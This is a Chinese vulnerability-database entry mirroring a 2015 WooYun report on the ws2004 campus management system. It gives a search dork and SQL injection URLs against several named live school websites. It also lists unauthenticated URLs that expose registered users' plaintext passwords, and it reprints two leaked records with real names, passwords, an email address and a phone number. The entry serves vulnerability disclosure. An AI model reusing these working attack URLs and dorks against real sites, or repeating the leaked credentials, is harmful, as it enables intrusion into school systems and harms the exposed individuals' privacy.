某校园管理系统漏洞打包

基本字段

漏洞编号：: SSV-95856

披露/发现时间：: 2015-01-19

提交时间：: 2015-01-19

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2015-091852

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述：漏洞打包 ### 详细说明：百度搜索：inurl:ws2004 技术支持：南京苏亚星资讯科技开发有限公司这里打包吧，不再一一提交。 ---------------- 0x01: SQL注入漏洞漏洞页面：ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID= 漏洞参数：ID 漏洞证明： 1# http://www.sdwhys.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14152457f109cdf365f1baa0db78580419034e15.jpg" alt="QQ图片20150106221416.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152457f109cdf365f1baa0db78580419034e15.jpg) [<img src="https://images.seebug.org/upload/201501/14152506d79c064bde121adea2f5353b385d9c81.jpg" alt="QQ图片20150106221511.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152506d79c064bde121adea2f5353b385d9c81.jpg) 2# http://www.sgtjb.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14152555fbfee37b9e3e65dbd18e5cb4125960aa.jpg" alt="QQ图片20150106221603.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152555fbfee37b9e3e65dbd18e5cb4125960aa.jpg) [<img src="https://images.seebug.org/upload/201501/14152609c6038a7e4267eb607fcc15fb33e20fcf.jpg" alt="QQ图片20150106221635.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152609c6038a7e4267eb607fcc15fb33e20fcf.jpg) 3# http://www.fzjcxx.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14152625c275e9ce594f3069e5a29e34d0b08830.jpg" alt="QQ图片20150106221740.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152625c275e9ce594f3069e5a29e34d0b08830.jpg) [<img src="https://images.seebug.org/upload/201501/141526358f1fb8eae0027e94b6ba93613af1d2c6.jpg" alt="QQ图片20150106221759.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/141526358f1fb8eae0027e94b6ba93613af1d2c6.jpg) 4# http://www.wuai.lwedu.sh.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/1415272612986694aca73173f7244c209c60f9f5.jpg" alt="QQ图片20150106221945.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1415272612986694aca73173f7244c209c60f9f5.jpg) [<img src="https://images.seebug.org/upload/201501/1415273848046e17a6d7087e9aa7a54bc999053e.jpg" alt="QQ图片20150106222012.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1415273848046e17a6d7087e9aa7a54bc999053e.jpg) 5# http://www.yzsx.net.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/141528239c76a84c52a2512fdb9b65784c5ffe88.jpg" alt="QQ图片20150106222104.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/141528239c76a84c52a2512fdb9b65784c5ffe88.jpg) [<img src="https://images.seebug.org/upload/201501/14152835f60cf673fefe5196961b677fcf56ed3c.jpg" alt="QQ图片20150106222138.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14152835f60cf673fefe5196961b677fcf56ed3c.jpg) 6# http://www.sndsx.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14153010dbf3c4ec09bf3728870ff508d539dc90.jpg" alt="QQ图片20150106222306.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14153010dbf3c4ec09bf3728870ff508d539dc90.jpg) [<img src="https://images.seebug.org/upload/201501/141530272ae85c0b1bec5f31d2d606d0db11f8ac.jpg" alt="QQ图片20150106222332.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/141530272ae85c0b1bec5f31d2d606d0db11f8ac.jpg) 7# http://www.yygy.net/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48* [<img src="https://images.seebug.org/upload/201501/14153037aa8101b4ae39ae8c74466a3b93d46d93.jpg" alt="QQ图片20150106222500.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14153037aa8101b4ae39ae8c74466a3b93d46d93.jpg) [<img src="https://images.seebug.org/upload/201501/14153045d5c590b0fd078582b091167d8d15a2c7.jpg" alt="QQ图片20150106222526.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14153045d5c590b0fd078582b091167d8d15a2c7.jpg) 0x02：获取任意注册用户的明文密码说明：与 [WooYun: 某校园管理系统设计缺陷导致获取任意管理员明文密码(无需登录)](http://www.wooyun.org/bugs/wooyun-2015-090403) 漏洞类似，但并非同一个点。这里是获取注册用户信息及密码，可遍历。直接打开链接为空白，可“查看源码”看到信息 1# http://www.cgyz.net.cn/ws2004/ http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=56 ``` <?xml version="1.0" encoding="GB2312"?> <DataListAll><DataList><UserName><![CDATA[xuan]]></UserName><RealName><![CDATA[王萱]]></RealName><PassWords><![CDATA[120428]]></PassWords><Question><![CDATA[]]></Question><Answer><![CDATA[]]></Answer><UserType><![CDATA[1]]></UserType><Email><![CDATA[]]></Email><PersonWeb><![CDATA[]]></PersonWeb><Telephone><![CDATA[]]></Telephone><City><![CDATA[]]></City><Province><![CDATA[]]></Province><Country><![CDATA[]]></Country></DataList></DataListAll> ``` http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=40 http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=49 …… 2# http://www.eedsyz.cn/ws2004/ http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=39 ``` <?xml version="1.0" encoding="GB2312"?> <DataListAll><DataList><UserName><![CDATA[真如本性]]></UserName><RealName><![CDATA[刘真如]]></RealName><PassWords><![CDATA[liuzhenru*()21]]></PassWords><Question><![CDATA[]]></Question><Answer><![CDATA[]]></Answer><UserType><![CDATA[1]]></UserType><Email><![CDATA[1179926121@qq.com]]></Email><PersonWeb><![CDATA[]]></PersonWeb><Telephone><![CDATA[15304776395]]></Telephone><City><![CDATA[东胜区]]></City><Province><![CDATA[内蒙古自治区]]></Province><Country><![CDATA[中华人民共和国]]></Country></DataList></DataListAll> ``` http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=46 http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=50 …… 3# http://www.sndsx.com/ws2004/ http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=24 http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=25 http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=62 …… 4# http://www.wzzx.net.cn/ws2004/ http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=11 http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=39 http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=22 …… 5# http://www.hwsyxx.com/ws2004/ http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=67 http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=83 http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=71 …… ### 漏洞证明：

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-091852

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

生命线

路人甲

2015-01-19 发现/披露了漏洞

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

某校园管理系统漏洞打包

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定